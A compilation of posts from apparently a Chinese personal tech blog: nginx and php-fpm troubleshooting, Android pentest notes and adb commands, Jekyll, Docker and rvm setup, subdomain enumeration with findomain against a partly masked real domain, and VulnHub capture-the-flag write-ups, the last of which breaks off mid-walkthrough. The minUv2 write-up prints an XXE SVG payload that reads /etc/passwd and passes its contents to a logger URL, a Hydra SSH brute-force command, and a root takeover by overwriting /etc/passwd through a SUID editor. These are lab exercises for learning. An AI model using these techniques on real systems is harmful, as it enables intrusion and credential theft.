看到比我头还大的404头就疼;确定各种php的配置都没错。
server {
location ~ \.php{
index indx.php index.html;
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}
}
就各种上网搜php-404,问人。都没答案。
正好最近薅了一个华为云服务器,反手就是nginx+php存储项目往上安装方便传输文件,配nginx的时候看到这么一行配置:
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
直拍大腿,当初配博客服务器的时候,嫌麻烦,直接把/etc/nginx/sites-enabled/这行配置注释掉了,自己在http区块配了php-location-server。赶紧重新配置php-fpm:
传送门:「移植」ubuntu with arm.公网存储容器搭建记录 http://www.chihou.pro/2019/11/10/Ubuntu-linux-with-arm/
重新软链接完php-fpm,迫不及待访问php文件,又报错:
舒了一口气,总算不是该死的404了。502报错基本上就是php-fpm的配置问题了,一般都是fpm在解析时出错。反手查看一波php运行日志:
cat /var/log/php7.2-fpm.log
[04-Dec-2019 17:58:14] NOTICE: ready to handle connections
[04-Dec-2019 17:58:14] NOTICE: systemd monitor interval set to 10000ms
果然,php-fpm解析超时了导致报错,直接搜索解决答案;
在php-fpm配置文件下加入fpm运行参数:
vi /etc/php/7.2/fpm/php-fpm.conf
;;;;;;;;;;;;;;;;;;
; Global Options ;
;;;;;;;;;;;;;;;;;;
pm.max_children = 50
pm.start_servers = 15
pm.min_spare_servers = 10
pm.max_spare_servers = 40
systemctl reload php-fpm
同时对nginx增加配置:
vi /etc/nginx/nginx.conf
http {
fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;
}
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
测试无误
访问index.php,终于看到了熟悉的phpinfo页面,至此排错、配置结束。
2020-02-20更新:
在linux下配置好nginx和php-fpm后,访问web页面不能显示,查看nginx访问日志,日志显示返回200,访问成功。 html静态页面没问题,但是php页面总是空白页也没有任何报错,经过查找,发现需要在nginx中加入一句话
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
安装完nginx后默认的fastcgi_params配置文件中没有上面这句话。
在nginx.conf中的
location ~ .php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
#fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
或者在fastcgi_params配置文件中加入
# PHP only, required if PHP was built with –enable-force-cgi-redirect
fastcgi_param REDIRECT_STATUS 200;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
然后重启nginx就可以显示出页面了。
nginx下运行php文件时返回200访问空白页: https://blog.csdn.net/xkweiguang/article/details/52795166
502badgateway:
apt自动化安装:
配置/etc/php/7.3/fpm/pool.d/www.conf文件:
php-fpm.conf: listen = 127.0.0.1:9000
nginx.conf: fastcgi_pass 127.0.0.1:9000;
php 502 bad gateway 解决方法: https://blog.csdn.net/ucmir183/article/details/80240112
以上。
= =|||
接触了一些安卓渗透的项目,根据不同安全公司内部的要求,规定对于安卓渗透技术的基本原则、工作方式;且使用不同的、对外的商业渗透测试。
综述包括如下:
1.代码、程序安全;
2.验证码机制安全;
3.越权检测;
4.服务器WEB漏洞。
防止不法分子阅读源码,了解运行逻辑。
防止不法分子读懂源码。
防止不发分子对安装包进行篡改操作。
|_主要onCreate操作类,弹窗代码:
AlertDialog.Builder builder = new Builder(MainActivity.this);
builder.setTitle("test alert" ) ;
builder.setMessage("test by bin4xin" ) ;
builder.setPositiveButton("yes" , null );
builder.show();
|_在关键位置插入toast提示代码:
btnToast1.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
// TODO Auto-generated method stub
Toast toast=Toast.makeText(MainActivity.this,"Toast Message",Toast.LENGTH_SHORT );
toast.setGravity(Gravity.CENTER, 0, 0);
toast.show();
}
});
|_在关键位置插入关键调试日志输出:
public static int d(String tsg,String msg)
Log.d("DEBUG", "This is a debug");
|_分析smali/so代码的具体校验位置,是否能修改绕过防护;
|_分析正版合法型数据的绕过。
防止不法分子篡改源码、二次打包后传播安装包。
so库和import库的区别,so文件可以理解成一个安装包的反汇编文件?)
(H5代码在安卓工程中的作用是否为静态代码、用于展示等)
防止升级apk为不法分子的二次打包的apk。
防止发行版apk可以调试
|_AndroidManifest.xml->[-]删除debuggable属性或设置为false;
adb(Android Debug Bridge)Android调试桥是一种功能多样的命令行工具,可让设备之间(PC端和移动端)进行通信。 adb 命令便于执行各种设备操作(例如安装和调试应用),并提供对 Unix Shell(可用来在设备上运行各种命令)的访问权限。 它是一种客户端-服务器程序。
本菜使用的是模拟器,不同模拟器端口不一样。比如谷歌模拟器端口则默认为5555;
$ adb connect 127.0.0.1:21503
adb server is out of date. killing...
* daemon started successfully *
connected to 127.0.0.1:21503
$ adb devices
List of devices attached
127.0.0.1:21503 device
Linux下的命令就不多说了;直接看adb的常用命令(在pc端控制台查看、使用) Android Debug Bridge version 1.0.32 device commands:
顾名思义,push,推送:
在pc端控制台将pc端的文件(夹)push到移动端,用法实例: $ adb push inject /data/local 1606 KB/s (17936 bytes in 0.010s) 进入安卓手机验证: root@SM-G9350:/data/local # ls gdb inject tmp如上所示inject文件被push到安卓机中。
与push相反
在pc端控制台将移动端的文件(夹)pull到pc端。 $ adb pull /data/local/inject C:\Users\本阿信 2507 KB/s (17936 bytes in 0.006s) 在pull文件夹控制台验证: $ dir 驱动器 C 中的卷是 root 卷的序列号是 0009-A6D5 C:\Users\本阿信 的目录(此下DIR为尖括号,会将文本格式闭合,所以换成括号) 2019/11/30 22:25 (DIR) . 2019/11/30 22:25 (DIR) .. 2019/11/28 17:15 (DIR) .android 2019/11/28 17:44 (DIR) .idlerc 2019/11/30 22:03 (DIR) .MemuHyperv 2019/10/16 22:05 (DIR) .ssh 2019/11/30 22:25 17,936 inject如上所示inject文件已经被pull到pc端了。
打开进入已连接安卓机的shell; adb提示已经连接上了安卓手机,直接进入系统。
$ adb shell root@SM-G9350:/ # whoami root root@SM-G9350:/ # pwd / root@SM-G9350:/ # uname -a Linux localhost 4.0.9 #661 SMP PREEMPT Mon Nov 4 13:15:47 CST 2019 i686 GNU/Linux可以发现有熟悉的Linux系统的影子~
后缀加入
command,不同于3 run remote shell command 远程运行shell命令。控制台不进入Andriod Shell;$ adb shell uname -a Linux localhost 4.0.9 #661 SMP PREEMPT Mon Nov 4 13:15:47 CST 2019 i686 GNU/Linux 如上,控制台回显信息,但此时还是在pc端控制台,并没有进入安卓控制台。
[
] - View device log 查看设备日志: 查看所有日志: $ adb logcat --------- beginning of main I/Netd ( 0): Netd 1.0 starting E/Netd ( 0): Failed to open /proc/sys/net/ipv6/conf/default/accept_ra_rt_table: No such file or directory E/Netd ( 0): Failed to open /proc/sys/net/ipv6/conf/eth0/accept_ra_rt_table: No such file or directory E/Netd ( 0): Failed to open /proc/sys/net/ipv6/conf/ifb0/accept_ra_rt_table: No such file or directory E/Netd ( 0): Failed to open /proc/sys/net/ipv6/conf/ifb1/accept_ra_rt_table: No such file or directory E/Netd ( 0): Failed to open /proc/sys/net/ipv6/conf/lo/accept_ra_rt_table: No such file or directory E/Netd ( 0): Failed to open /proc/sys/net/ipv6/conf/sit0/accept_ra_rt_table: No such file or directory I/installd( 0): installd firing up I/ ( 0): debuggerd: Apr 4 2019 17:10:30过滤日志:
$ adb logcat E/WifiStateMachine E/WifiStateMachine( 509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55 E/WifiStateMachine( 509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55 E/WifiStateMachine( 509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55 E/WifiStateMachine( 509): WifiStateMachine shouldSwitchNetwork txSuccessRate=-0.00 rxSuccessRate=-0.00 delta 999 -> 999 E/WifiStateMachine( 509): CMD_AUTO_ROAM sup state CompletedState my state ConnectedState nid=0 config "lgrut25642"NONE roam=1 to any targetRoamBSSID any E/WifiStateMachine( 509): AUTO_ROAM nothing to do E/WifiStateMachine( 509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
[-lrtsd]
安装1.apk命令(在pc端,且1.apk为绝对路径) $ adb install 1.apk 3480 KB/s (54687952 bytes in 15.344s) pkg: /data/local/tmp/1.apk Success
[-k]
- remove this app package from the device ('-k' means keep the data and cache directories) $ adb uninstall [-k] com.com.pack Success -k参数值保存安装数据和缓存。
- show this help message;显示帮助信息
- show version num;显示版本号
以上,记录。
使用nginx作为jekyll博客的服务启动容器介绍:
首先先从用户角度解释一下我理解中的jekyll服务的运行原理
1.编写markdown文档->2.markdown解析->3.jekyll运行生成web站点文件
所以我们直接去找站点文件夹,把web站点文件夹复制到nginx的根目录下就好了
cd /your-jekyll-web/
ls #我们可以看到_site/文件夹,这个文件夹就是web站点文件夹
cd _site/
vi 2019-01-01-your-article-title.markdown
cp _site/ /var/www/html/ -r
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
systemctl start nginx
curl localhost
测试nginx完毕没有问题,既可以直接启动nginx。然后看一下本地页面,如果出现本地页面就是调试完成了。
cat /etc/nginx/nginx.conf
中间略去,直接看server区块
server {
listen 80;
server_name ip; #修改这里,如果这里你是公网ip,修改成公网ip就可以啦。
#charset koi8-r;
#access_log logs/host.access.log main;
root /home/www/_site/;
location / {
#try_files $uri $uri/ /index.php$is_args$args;
index index.html index.htm;
}
location ~ \.php{ #这里是定位到输入php的页面解析代码,如果不需要可以直接注释掉。
index index.php index.html;
include /etc/nginx/snippets/fastcgi-php.conf;
fastcgi_pass unix:/etc/init.d/php7.3-fpm;
}
# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
location ~ /\.ht {
deny all;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
#location = /50x.html {
# root /usr/share/nginx/html;
}
}
同样测试一下,没问题就可以了。 这个时候就可以看一下公网地址是不是已经可以访问上了,访问上就没什么问题了。维护博客就可以通过markdown文件的形式post到服务器上用jekyll解析就可以访问了。
希望你们自己也能动手试试看。
么么哒
安装必要的一些系统工具
sudo apt-get update
sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common
安装GPG证书
curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
写入软件源信息
sudo add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"
更新并安装 Docker-CE
sudo apt-get -y update
sudo apt-get -y install docker-ce
#查看当前环境下docker拥有的镜像
docker images
#使用宿主机80端口映射且运行ubuntu镜像,镜像使用bash执行
docker run -it -p 80:80 ubuntu /bin/bash
#保存指令,由于docker不会进行容器修改的保存,所以需要手动保存
docker commit -a "runoob.com" -m "my apache" a404c6c174a2 mymysql:v1
#运行保存的容器
docker run -it -p 80:80 ubuntu:v1
安装netselect之前无法安装netselect-apt,会报错。即netselect是必须依赖项
安装netselect_0.3.ds1-28+b1_amd64.deb
wget http://ftp.cn.debian.org/debian/pool/main/n/netselect/netselect_0.3.ds1-28+b1_amd64.deb
dpkg -i netselect_0.3.ds1-28+b1_amd64.deb
以下两个是本菜docker安装时出现的依赖项,贴出来,基本上就是缺什么装什么就行了。
解决"Can't locate Term/ReadLine.pm"
安装:apt install libterm-readkey-perl -y
解决"No usable dialog-like program is installed"
安装:apt install dialog
wget http://ftp.cn.debian.org/debian/pool/main/n/netselect/netselect-apt_0.3.ds1-28_all.deb
dpkg -i netselect-apt_0.3.ds1-28_all.deb
安装结束应无任何报错,即代表成功;也可以通过输入两个包进行验证。
cd tpotce/iso/install
./install.sh --type=auto --conf=tpot.conf #自动编译配置,配置文件为tpot.conf
cp tpot.conf.dist tpot.conf #生成配置文件
报错 Aborting:debian bionic is not support.看样子是系统版本的问题,无法解决。~搞了一下午,脑阔疼。
第一个问题:这玩意儿是什么?通俗的来讲:
Jekyll = web server + static blog + front end UI
如果你想拥有一个自己的博客但是苦于数据库没学好,你可以来试试看;再如果想学前端,你也可以试试看~
做配置前请默念三遍四者之间的关系,保证倒背如流在进行下一步:
1.Ruby 是语言。
2.gem 是一组 Ruby 程序,类似于「包」的概念。
3.RubyGems 是 Ruby 的包管理器,用来管理和安装 gems 的。
4.bundle是用来管理gems的项目,确保能够正确地安装项目依赖,确保能够运行正确的包。
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
##如果上面秘钥导入失败会提示command建议,直接复制下来,实在不行找不到使用下面这个链接下载。
curl -L https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
source /usr/local/rvm/scripts/rvm ##配置一次性变量,这里terminal暂时使用一下。熟悉的朋友可以直接配进bashrc自启
期间会安装各种依赖包,等待一段时间后出现complete字样即成功安装。
接着就是换源,老外网真的慢- -没办法,跟linux换源是一个道理
#echo "ruby_url=https://cache.ruby-china.org/pub/ruby" > ~/.rvm/user/db
#此处本菜机子的是.rvmrc,直接把url导入:
#echo "ruby_url=https://cache.ruby-china.org/pub/ruby" > /root/.rvmrc
========================2020-03-31更新:换源文件=================================
+==============================================================================+
|echo "ruby_url=https://cache.ruby-china.com/pub/ruby" > /usr/local/rvm/user/db|
+==============================================================================+
找不到更新rvm源的文件,如果是按照上面方法,基本是在上面这个文件下。
[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# echo "ruby_url=https://cache.ruby-china.com/pub/ruby" > /usr/local/rvm/user/db
[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# cat db
ruby_url=https://cache.ruby-china.com/pub/ruby
[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# rvm install "ruby-2.5.7"
Searching for binary rubies, this might take some time.
No binary rubies available for: centos/7/x86_64/ruby-2.5.7.
Continuing with compilation. Please read 'rvm help mount' to get more information on binary rubies.
Checking requirements for centos.
Requirements installation successful.
Installing Ruby from source to: /usr/local/rvm/rubies/ruby-2.5.7, this may take a while depending on your cpu(s)...
ruby-2.5.7 - #downloading ruby-2.5.7, this may take a while depending on your connection...
** Resuming transfer from byte position 323584
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 12.8M 100 12.8M 0 0 6097k 0 0:00:02 0:00:02 --:--:-- 6095k
ruby-2.5.7 - #extracting ruby-2.5.7 to /usr/local/rvm/src/ruby-2.5.7.....
ruby-2.5.7 - #configuring...................................................................
ruby-2.5.7 - #post-configuration..
ruby-2.5.7 - #compiling..................................................................................
ruby-2.5.7 - #installing..............................
ruby-2.5.7 - #making binaries executable..
ruby-2.5.7 - #downloading rubygems-3.0.8
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
25 867k 25 223k 0 0 15138 0 0:00:58 0:00:15 0:00:43 16300
ruby-2.5.7 - #adjusting #shebangs for (gem irb erb ri rdoc testrb rake).
Install of ruby-2.5.7 - #complete
Ruby was built without documentation, to build it run: rvm docs generate-ri
基本上看到上面的complete就安装完了
#安装ruby rvm list know #查询已知rvm软件列表 rvm install “ruby-2.5.5” #安装ruby rvm use 2.5.5 #指定使用的ruby版本号
#配置前确认:
rvm -v
rvm 1.29.9 (latest) by Michal Papis, Piotr Kuczynski, Wayne E. Seguin [https://rvm.io]
gem -v
3.0.6
ruby -v
ruby -v
ruby 2.5.5p157 (2019-03-15 revision 67260) [x86_64-linux]
gem source -l
gem sources --remove https://rubygems.org/
gem sources -a https://gems.ruby-china.com ##换源 换源 换源
gem update --system
gem install bundler
gem install jekyll
安装jekyll工具,保证jekyll能顺畅运行。此处跟每个人下载的模板不一样所需要的工具不一样,我这里把基本的一些工具贴上,后期模板不一样看一下环境要求根据要求即可。
gem install bundler #打包用工具
gem install jekyll-paginate #分页设置工具 重要 一定要安装
gem install minima #默认主题
gem install jekyll-feed #订阅用的工具
% sudo bundle exec rake production:export
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
fatal: 不是一个 git 仓库(或者任何父目录):.git
Could not find rake-10.5.0 in any of the sources
Run `bundle install` to install missing gems.
到你所在的博客目录下,git init:
bin4xin@bin4xin's MacbookPro text-theme % pwd
/Users/bin4xin/blog/text-theme
bin4xin@bin4xin's MacbookPro text-theme % git init
已初始化空的 Git 仓库于 /Users/bin4xin/blog/text-theme/.git/
% bundle config mirror.https://rubygems.org https://gems.ruby-china.com
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
bin4xin@bin4xin's MacbookPro text-theme % sudo bundle install
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root will break this application for all
non-root users on this machine.
Fetching gem metadata from https://gems.ruby-china.com/...........
Fetching rake 10.5.0
Installing rake 10.5.0
Fetching concurrent-ruby 1.1.5
Installing concurrent-ruby 1.1.5
Fetching i18n 1.7.0
Installing i18n 1.7.0
··省略
··
··
Fetching sassc 2.2.1
Installing sassc 2.2.1 with native extensions
Bundle complete! 3 Gemfile dependencies, 42 gems now installed.
一般你们都是直接下载了模板,模板解压后进入文件夹即可。比如我这里模板文件夹叫blog
unzip blog.zip
cd blog/
git init #如果你有多个模板,记得先用这个命令,把当前文件夹当做根目录;同理使用其他模板第一步输入这个命令
jekyll serve -P 80 #自动构建并运行jekyll服务
Could not find gem 'X' in any of the gem sources listed in your Gemfile.(Bundler::GemNotFound)
gem install X
安装即可
现在jekyll服务启动后,web的服务是使用WEBrick服务器,会有以下让我觉得不舒服的地方:
1)目录遍历
2)无法隐藏服务器版本号
(也许是能够这样操作但是我没有发现),所以试了下发现nginx也是可以的
以上。
鲲鹏云服务器Ubuntu 18.04 64bit with ARM
PHP+NGINX软链接演示
摘要:华为云社区的活动好多~最近领了个ARM云服务器。打算用服务器搭建一个云存储服务容器方便自己上传论文,说干就干,于是就是在网上找了个开源的项目。下载压缩包下来完事,发现没有php环境,得自己配置。行吧,自己配。
安装web前记得先把源换一下,ubuntu的官方源我也测试了,确实有点慢。注意换源要换成ARM的版本。这个本菜换的源供大家参考。
##ubuntu-ports里面有arm64的源
#切记换掉源~
vi /etc/apt/sources.list
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-security main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-updates main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-backports main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-security main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-updates main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-backports main multiverse restricted universe
sudo apt update
#等待apt更新完成即可,列表更新完成就可以tab补全啦~
sudo apt install nginx
ps -ef |grep nginx #查看进程
curl localhost #本地调试出现welcome页面即本地调试成功
如果想要公网访问ip需开放入方向安全规则80端口。找到控制台-入方向规则-添加规则
访问公网ip即可。
sudo apt install php-fpm ##这里注意查看一下php-fpm的管理器版本,后面配置软链接如果版本不一致会报错
# cd /var/run/php/
# ls
php7.0-fpm.pid php7.0-fpm.sock ##可以看到此处本菜的版本是7.0
进入/etc/nginx/sites-available 目录下新建webserver,配置php解析文件。
server {
listen 80; ##网站监听端口,这里设置为80,即浏览器默认的HTTP端口号。
root /var/www/html; ##网站根目录
index index.php index.html index.htm index.nginx-debian.html; ##配置web默认页
server_name ip##你的公网ip;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ { ##如果url输入为php后缀文件则传给php-fpm进行处理。
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; ##注意此处的解析目录的更改
}
location ~ /\.ht {
deny all; ##该区块禁止.htaccess的访问。
}
}
如果报错无法找到webserver(此处每人不同,如果未修改则是default),进入/etc/nginx/sites-enabled目录下查看软链接配置,删除多余配置,留下default和webserver软链接文件
sudo ln -s /etc/nginx/sites-available/webserver /etc/nginx/sites-enabled/
sudo nginx -t #nginx测试,无报错进入下一步
sudo systemctl reload nginx #重启服务,载入最新配置
报错解决:
/etc/nginx/sites-enabled# ll
total 8
drwxr-xr-x 2 root root 4096 Nov 12 11:03 ./
drwxr-xr-x 6 root root 4096 Nov 12 11:34 ../
lrwxrwxrwx 1 root root 34 Nov 12 10:51 default -> /etc/nginx/sites-available/default
lrwxrwxrwx 1 root root 34 Nov 12 11:02 webserver -> /etc/nginx/sites-available/webserver
rm -rf webserver
sudo ln -s /etc/nginx/sites-available/webserver /etc/nginx/sites-enabled/
在web服务目录下创建php文件测试。
sudo vi test.php
<?phpphpinfo();?>
使用浏览器输入:$_公网ip/test.php;测试成功:
别忘了我们的最终目的,是部署云服务器容器。将web文件夹解压至web根目录下。访问即可。 由于此处使用的是第三方开源容器项目,所以安全性无法保障,不保证后门等情况不会发生,所以介意者可以自行搭建(代码托管平台也有)。为了避免麻烦这里把所有的与项目有关的信息码一下,见谅。
好了。基本上一个自己使用的云存储容器就可以投入使用了。手机端、PC端都可以使用。建议大家可以自己尝试一下。
么么哒
摘要:之前在暑假里申请注册了个云先知平台账号,平时没事闲(mo)着(yang)的(gong)时候当当土拨鼠挖挖洞。挖过的都懂,是一个类似于渗透测试的中心化平台。乙方公司有这个需求,通过这个平台发放任务,通过不同的漏洞等级【严重】-【高危】-【中危】-【低危】,严重就是危及到服务器权限,能够get web shell、root甚至横向渗透,依次类推每一项,危及程度依次类推,有兴趣的朋友自行搜索体会(你们可以猜猜xss在哪个位置)。
以上背景,每份任务都会规定好一些任务域名,指定好。其他的域名没有备案不允许碰。如:
重点就来了,前面的*,是需要我们自己去测试的,也就是说,不同的 * 会有别样的惊喜。
那么这就推出咱们的主角:findomain,跨平台的子域名搜集工具。
$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ apt-get install cargo
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin
$ findomain
1、进行简单的子域名搜索,并输出信息:
findomain -t example.com
2、使用所有的API进行子域名搜索,并输出信息:
findomain -t example.com –a
3、搜索子域名,并将输出导出为CSV文件格式:
findomain -t example.com -o csv
4、使用所有的API进行子域名搜索,并将输出导出为CSV文件格式:
findomain -t example.com -a -o csv
$ findomain -t a****un.com -o csv
$ Target ==> a****un.com
Searching in the CertSpotter API...
Searching in the Bufferover API...
Searching in the Crtsh database...
Searching in the Virustotal API...
Searching in the Sublist3r API...
Searching in the Facebook API...
Searching in the Threadcrowd API...
Searching in the Spyse API...
An error ❌ has occurred while parsing the JSON obtained from the Threadcrowd API. Error description: JSON error.
An error ❌ has occurred while parsing the JSON obtained from the Bufferover API. Error description: JSON error.
An error ❌ has occurred while parsing the JSON obtained from the Sublist3r API. Error description: JSON error.
A timeout ⏳ error has occurred while processing the request in the Facebook API. Error description: timed out
A total of `153` subdomains were found for ==> a***un.com
Good luck Hax0r !
>> Filename for the target aliyun.com was saved in: ./a*****n.com_1680.csv
可以看到 A total of 153 subdomains.所以使用findomain工具一共搜集到了153个子域名。最后,goodluck。
且输出的csv文件就输出在运行工具的当前文件夹下。推荐大家可以试试看,搜集信息还是很好用的,么么哒
hello,各位。最近闲来无事,工作之余偷偷用公司电脑测试入侵了一个linux靶机,遂记录下。(手动狗头) 这个靶机本身难度适中,复现了svg的代码执行漏洞且要求对linux的系统命令较为熟悉;svg大体来说是一种图像文件格式,基于XML,由W3C联盟进行开发的,支持网页打开,编辑方便等。可以自行深入搜索~各位大佬见笑。
minUv2下载地址:
Download (Mirror)
Download (Torrent)
江湖规矩,神器开路:首先先用Nmap扫描确定靶机地址。发现靶机ip。
这里靶机只支持vbox,所以得桥接通信,打码请谅解~
确定ip直接端口扫描~
发现只开放了两个端口:22、3306端口。22端口暂时先放着不管,咱们看看3306端口。
是一个web页面,emmmm.主角登场,svg图像~
小弟赶紧dirb扫描一波,果然有发现。
#扫描3306端口下的html后缀的文件
dirb http://$_ip:port -X .html
--------------
+ http://$_ip:port/upload.html (CODE:200|SIZE:908)
--------------
DOWNLOADED: 4612 - FOUND: 1
发现了上传网页,且只能上传svg、img文件,又惊又喜。exp搜索一哈找到poc,验证一下漏洞的存在。poc代码如下:
#poc上传上去页面回显
#<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://localhost/?file=" +
encodeURIComponent(document.getElementsByTagName("text") [0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);
</script></svg>
果然有xxe漏洞,但是验证了漏洞不能让我们有实际的渗透进展,只能对一些文件内容进行查看,无法得到shell,要怎么办呢?
就在小弟愁眉苦脸的时候,忽然看到最后一行用户名的进程是/bin/ash,想到bash shell会有历史纪录,赶紧重新上传一个poc验证想法。回显内容:
"./ash.history"获取~
Useradd –D bossdonttrackme –p superultrapass3
根据所得的内容生成用户字典(passwd回显的用户名),密码字典。用Hydra跑一下。
##hydra -L /root/Documents/test/minu/use.txt -P /root/Documents/test/minu/passwd.txt ssh://$_ip
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or
secret service organizations, or for illegal purposes.
[WARNING] Many SSH configurations limit the number of parallel tasks, it is
recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:30/p:1), ~2 tries per task
[DATA] attacking ssh://$_ip:22/
[22][ssh] host: $_ip ** login: employee password: superultrapass3**
1 of 1 target successfully completed, 1 valid password found
##跑出来账号密码employee:uperultrapass3,ssh连上去。
##连接上去查看一下基本信息
ssh employee@ip
whoami
id | find -perm -4000 2>/dev/null
发现micro和bbsuid不需要高权限,运行一下,发现micro是一个文本编辑工具器。接下来就简单了。
#生成一份hash值,替换掉passwd的用户密码,这样密码就已知了。
#用micro编辑器打开passwd文件,替换root密码保存即可
passwd -1 -salty root admin123(随意)
cat /etc/passwd |/usr/bin/micro
这样我们就已知root密码了,直接切换用户
minuv2:~$ su root
Password:
minuv2:/home/employee# whoami
root
minuv2:/home/employee#
获得flag~感谢各位
hello,各位看官。最近忙里偷闲花了两天时间测试入侵了一个linux靶机,遂记录下。这个靶机我觉得挺适合刚入门的有一些基础的白帽子,对就是你!,大部分flag都是利用一些工具来获得。大佬看客笑看便是(手动狗头)。 整篇记录的都是小弟的思路,看官们跟着小弟的思路看就是了,会有些乱。见笑。
靶机来自vulnhub,下载地址如下:
PumpkinRaising:
Download (Mirror): https://download.vulnhub.com/missionpumpkin/PumpkinRaising.ova
Download (Torrent): https://download.vulnhub.com/missionpumpkin/PumpkinRaising.ova.torrent
江湖规矩,神器开路:首先先用Nmap扫描确定靶机地址。发现开放的靶机ip。
扫描一波(-O -A狗头):
咱们发现没有多余的端口开放,中规中矩,22,80端口。附带扫出80端口下的robots.txt。小弟一个激灵,这么多?心里美滋滋一个一个打开看,不急,这次怕是十拿九稳(狗头)。22端口先不管他,小弟看到这么多内容的robots文件夹,如获至宝赶紧打开,我的乖,目录图片文件路径,先看看文件选项有没有什么线索。
小弟试下来后发现文件只有如下能够访问:
1)underconstruction.html:
(页面名意还在建设的页面)提示我们说图片下面有猫腻。咱们先把这个uc.gif图片下载下来试试水。
正好小弟最近在研究图片隐写,丢到Stegsolve查看一波。跟普通图片差不多Alpha P 1-7都是空白
翻了又翻觉得RedP6、7有点异常,打开数据抽取查看源码没有收获(原谅小弟,小弟是noob~);尝试了GRB各种组合,各种低0位,也尝试了提取bin都未提取出有用的信息。
忽然想到这个图片是gif,会不会有偏移呢?赶紧Stereogram Slover尝试偏移,不出所料也失败了,就这样在这张图片上浪费了不少时间。
既然找不到有用的信息,那么这张图片先放一放。。不急,先往后面看。继续通过robots文件的内容查看。
2)hidden目录的note文本
hidden目录下的note文本文件,显示了一些貌似账号密码的文本,难道是ssh的账号信息?不会这么简单吧,虽然嘴上说着不会,身体却很诚实去试了试,不行。。但是我们到现在还没有发现类似登陆页面的东西,也先放一放。
3) /seeds/seed.txt.gpg
访问后直接下载下来了,gpg?下载下来打开乱码,谷歌一哈搜到几个工具,我这里用的是kali的gpg(没用过可以自行百度有教程安装,几百K)
花了点时间摸索了一下发现了线索
看着像摩斯密码,丢到摩斯解密工具里解密,就这样小弟居然得到了第一个flag(id):69507
咱们再来看看主页有些啥。80端口下静态页面~
查看源码,得到两个有用的信息:
